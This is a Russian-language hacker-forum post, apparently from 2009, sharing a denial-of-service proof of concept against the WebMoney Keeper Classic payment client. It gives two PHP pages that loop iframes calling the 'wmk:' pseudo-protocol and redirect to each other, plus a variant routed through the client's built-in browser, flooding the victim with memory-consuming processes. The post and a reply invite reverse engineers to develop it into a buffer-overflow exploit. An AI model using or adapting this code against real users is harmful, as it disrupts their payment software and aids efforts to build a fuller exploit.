Нашёл как вогнать клиент от Webmoney в DOS. Исполнение вообще очень напоминает олдскульные сплоенты под IE. Должно работать под IE и FF. Ну и надо быть залогиненым в кипере. Итак, создаём две страницы: index.php PHP: <?php for($i=0; $i!=10; $i++) echo ‘<iframe src=”wmk:display?window=about”></iframe><iframe src=”wmk:exit?BringToFront=n”></iframe>’; ?> <iframe src=”wmk:exit?BringToFront=Y”></iframe> <script>document.location.href=”http://_ваш_саент_/index2.php”;</script> index2.php PHP: <?php for($i=0; $i!=10; $i++) echo ‘<iframe src=”wmk:display?window=about”></iframe><iframe src=”wmk:exit?BringToFront=n”></iframe>’; ?> <iframe src=”wmk:exit?BringToFront=Y”></iframe> <script>document.location.href=”http://_ваш_саент_/index.php”;</script> Ну и всё, натравливаем на индекс или делаем вот так ещё в какой-нибудь третьей страничке (тогда распространителем кучи окон будет не IE/FF, а встроенная просматривалка Webmoney): PHP: <script>document.location.href=”wmk:explore?url=javascript:document.location.href=”http://_ваш_саент_/index.php”&BRINGTOFRONT=Y&title=let the horror begin”;</script> Создаётся дофига вебманевских процессов, жрущих память. Есть там BOF, или нет - я не в курсе, ибо с реверсингом не знаком. Поэтому создал топик для обсуждений - вдруг что-то более полезное можно из этого выжать. Так же неплохо было бы проверить на новых версиях. Также в FF нужно чтобы пользователь уже до этого проходил по псевдопротокольным ссылкам вида "wmk:" и оставил там галочку "запомнить выбор и больше не спаршивать". (c) brain[pillow] http://brainpillow.cc/2009/02/webmoney-keeper-classic-3606-dos/
Где реверсеры? Неужели никому не интересно? Ведь есть вероятность написать эксплоит к киперу, неужто никто не неходит эту идею заманчивой?